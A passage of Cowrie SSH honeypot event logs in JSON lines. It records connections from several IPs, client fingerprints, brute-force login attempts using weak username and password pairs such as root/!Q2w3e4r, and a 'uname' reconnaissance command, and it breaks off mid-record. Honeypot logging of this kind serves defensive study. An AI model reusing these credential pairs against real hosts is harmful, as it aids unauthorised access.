{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:20.663562Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:20.665201Z","src_ip":"201.148.180.50","session":"6b3cf18e2d4d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:20.811177Z","src_ip":"212.227.125.160","session":"3f5037bc1524"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:21:20.812230Z","src_ip":"212.227.125.160","session":"3f5037bc1524"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456789","message":"login attempt [elasticsearch/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:21:23.200752Z","src_ip":"212.227.125.160","session":"3f5037bc1524"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:24.682925Z","src_ip":"212.227.125.160","session":"3f5037bc1524"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40146,"dst_ip":"1.2.3.4","dst_port":22,"session":"533bb8bc39f4","protocol":"ssh","message":"New connection: 212.227.235.229:40146 (1.2.3.4:22) [session: 533bb8bc39f4]","sensor":"my-vps","timestamp":"2025-08-31T02:21:27.097306Z"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:21:36.072610Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54728,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e18bf8340a7","protocol":"ssh","message":"New connection: 41.226.27.251:54728 (1.2.3.4:22) [session: 1e18bf8340a7]","sensor":"my-vps","timestamp":"2025-08-31T02:21:36.561493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:36.589823Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:36.605126Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:21:36.782403Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:21:37.311023Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:21:37.311711Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:37.313078Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:37.313716Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:37.365462Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:37.366809Z","src_ip":"41.226.27.251","session":"1e18bf8340a7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60124,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb11c0adf668","protocol":"ssh","message":"New connection: 41.226.27.251:60124 (1.2.3.4:22) [session: cb11c0adf668]","sensor":"my-vps","timestamp":"2025-08-31T02:21:56.803715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:21:56.804659Z","src_ip":"41.226.27.251","session":"cb11c0adf668"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:21:56.853872Z","src_ip":"41.226.27.251","session":"cb11c0adf668"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:21:57.003216Z","src_ip":"41.226.27.251","session":"cb11c0adf668"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:21:58.215956Z","src_ip":"41.226.27.251","session":"cb11c0adf668"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49882,"dst_ip":"1.2.3.4","dst_port":22,"session":"69e9865e768d","protocol":"ssh","message":"New connection: 212.227.235.229:49882 (1.2.3.4:22) [session: 69e9865e768d]","sensor":"my-vps","timestamp":"2025-08-31T02:22:00.048825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:00.825557Z","src_ip":"212.227.235.229","session":"69e9865e768d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:22:00.826226Z","src_ip":"212.227.235.229","session":"69e9865e768d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"password","message":"login attempt [elasticsearch/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:22:06.926953Z","src_ip":"212.227.235.229","session":"69e9865e768d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54084,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f4138512318","protocol":"ssh","message":"New connection: 217.72.205.35:54084 (1.2.3.4:22) [session: 6f4138512318]","sensor":"my-vps","timestamp":"2025-08-31T02:22:08.447158Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:08.448205Z","src_ip":"217.72.205.35","session":"6f4138512318"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:08.808349Z","src_ip":"212.227.235.229","session":"69e9865e768d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60176,"dst_ip":"1.2.3.4","dst_port":22,"session":"f310c9006a00","protocol":"ssh","message":"New connection: 41.226.27.251:60176 (1.2.3.4:22) [session: f310c9006a00]","sensor":"my-vps","timestamp":"2025-08-31T02:22:16.788431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:16.813583Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:22:16.844764Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:22:17.007457Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:22:17.113818Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:22:17.114702Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:17.159755Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:17.160736Z","src_ip":"41.226.27.251","session":"f310c9006a00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:22:18.832013Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:22:18.832767Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40284,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0952b5ae66e","protocol":"ssh","message":"New connection: 212.227.125.160:40284 (1.2.3.4:22) [session: c0952b5ae66e]","sensor":"my-vps","timestamp":"2025-08-31T02:22:22.115260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:22.598338Z","src_ip":"212.227.125.160","session":"c0952b5ae66e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:22:22.599097Z","src_ip":"212.227.125.160","session":"c0952b5ae66e"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"password","message":"login attempt [elasticsearch/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:22:24.857026Z","src_ip":"212.227.125.160","session":"c0952b5ae66e"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:26.475464Z","src_ip":"212.227.125.160","session":"c0952b5ae66e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"10.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:28.899218Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.session.closed","duration":"91.5","message":"Connection lost after 91.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:28.900386Z","src_ip":"212.227.125.160","session":"646d3a207d7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44548,"dst_ip":"1.2.3.4","dst_port":22,"session":"f15061a8101d","protocol":"ssh","message":"New connection: 212.227.125.160:44548 (1.2.3.4:22) [session: f15061a8101d]","sensor":"my-vps","timestamp":"2025-08-31T02:22:29.875286Z"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:22:36.172769Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51512,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e24725ff10d","protocol":"ssh","message":"New connection: 41.226.27.251:51512 (1.2.3.4:22) [session: 5e24725ff10d]","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.295456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.296366Z","src_ip":"41.226.27.251","session":"5e24725ff10d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.344459Z","src_ip":"41.226.27.251","session":"5e24725ff10d"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.490784Z","src_ip":"41.226.27.251","session":"5e24725ff10d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.546087Z","src_ip":"212.227.125.160","session":"f15061a8101d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-